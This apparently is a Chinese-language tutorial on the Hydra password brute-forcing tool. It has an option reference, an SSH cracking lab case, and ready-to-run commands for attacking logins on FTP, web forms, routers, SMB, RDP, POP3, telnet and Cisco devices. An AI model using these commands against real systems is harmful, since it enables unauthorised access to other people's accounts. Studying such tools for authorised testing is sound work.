一篇文章總結暴力破解方法大全

九頭蛇hydra

大家都看過美國隊長吧

對大反派hydra組織還有印象嗎？

今天介紹的這款APP，也叫這個名字。

hydra是強力thc的一款開源的暴力破解工具

功能非常強大

kali下是預設安裝的，幾乎支援所有協定的線上破解。

能否暴力破解，最重要在于字典是否強大

還有電腦的性能足夠能跑

我們就介紹下，這個裝備怎麼用

使用方法

文法：Hydra 參數 IP 服務      

參數：
-l login 小寫; 指定使用者 進行 破解
-L file 大寫，指定使用者的username字典
-p pass 小寫，用于指定密碼破解，很少使用，一般采用密碼字典。
-P file 大寫，用于指定密碼字典。
-e ns 額外的選項，n：空密碼試探，s：使用指定username和密碼試探
-M file 指定目标ip清單檔案，批量破解。
-o file 指定結果輸出檔案
-f 找到第一對登入名或者密碼的時候中止破解。
-t tasks 同時運作的線程數l預設是16
-w time 設定最大逾時時間，機關
-v / -V 顯示詳細過程
-R 恢複爆破（如果破解中斷了，下次執行 hydra -R /path/to/hydra.restore 就可以conitnue任務。）
-x 自定義密碼。      

service：指定服務名，支援的服務跟協定有：telnet，ftp，pop3等等。
注意點：1.自己建立字典,然後放在目前的目錄下或者指定目錄。
2.參數可以統一放在最後，格式比如hydra ip 服務 參數。
3.如果能确定使用者名一項時候，比如web登入破解，直接用 -l就可以，然後剩餘時間破解密碼。
4.缺點，如果目标網站登入時候需要驗證碼就無法破解。
5.man hydra最萬能。
6.或者hydra -U http-form等檢視具體幫助。      

案例分析

暴破ssh登入密碼

環境介紹

攻擊 ：kali
hydra工具

靶機：192.168.154.131
ssh服務，正常運作      

為了測試友善，我們建立兩個簡單的字典檔案，如下：

開始爆破

root@kali:/opt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh      

破解成功

測試登入

各種協定破解彙總

FTP協定破解

破解ftp：

hydra -L username字典 -P 密碼字典 -t 6 -e ns IP位址 -v      

http協定破解

get方式送出，破解web登入：

hydra -L username -P 密碼字典 -t 線程 -v -e ns IP位址 http-get /admin/
hydra -L username -P 密碼字典 -t 線程 -v -e ns -f IP位址 http-get /admin/index.php

post方式送出，破解web登入：

hydra -f -l username  -P 密碼字典 -V -s 9900 IP位址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"


#/index.php …這個是登入的 url
#後門是POST的資料 其中的username 密碼使用 USER PASS 來代替
#然後是如果登入出錯 會出現的字元 。。。然後開始破解      

https協定破解

破解https

hydra -m /index.php -l username -P 密碼字典.txt IP位址 https      

路由器破解

hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 為嘗試破解的使用者名。

# -x 6:10:1a. 表示枚舉的密碼由 數字、小寫字母和單字元’.'等等組成，長度為 6 - 10 位。-t 8 表示分 8 個并行任務進行爆破嘗試。192.168.1.1 為 Router 位址。http-get 為破解方式（協定）      

http-proxy協定破解

破解http-proxy：

hydra -l username  -P 字典.txt http-proxy://IP位址      

smb破解

破解smb：

hydra -l username字典 -P 密碼字典 IP位址 smb      

 Windows遠端桌面

破解rdp(windows遠端登入)：

hydra ip位址 rdp -l administrator -P 密碼字典.txt -V      

郵箱pop3

破解郵箱pop3：

hydra -l username -P 密碼字典.txt my.pop3.mail pop3      

telnet破解

hydra ip位址 telnet -l username字典.txt -P 密碼字典.txt -t 32 -s 23 -e ns -f -V      

語音通訊工具teamspeak

hydra -l 使用者名字典 -P 密碼字典.txt -s 端口号 -vV ip teamspeak      

cisco

hydra -P 密碼字典 IP位址 cisco
hydra -m cloud -P 密碼字典 IP位址 cisco-enable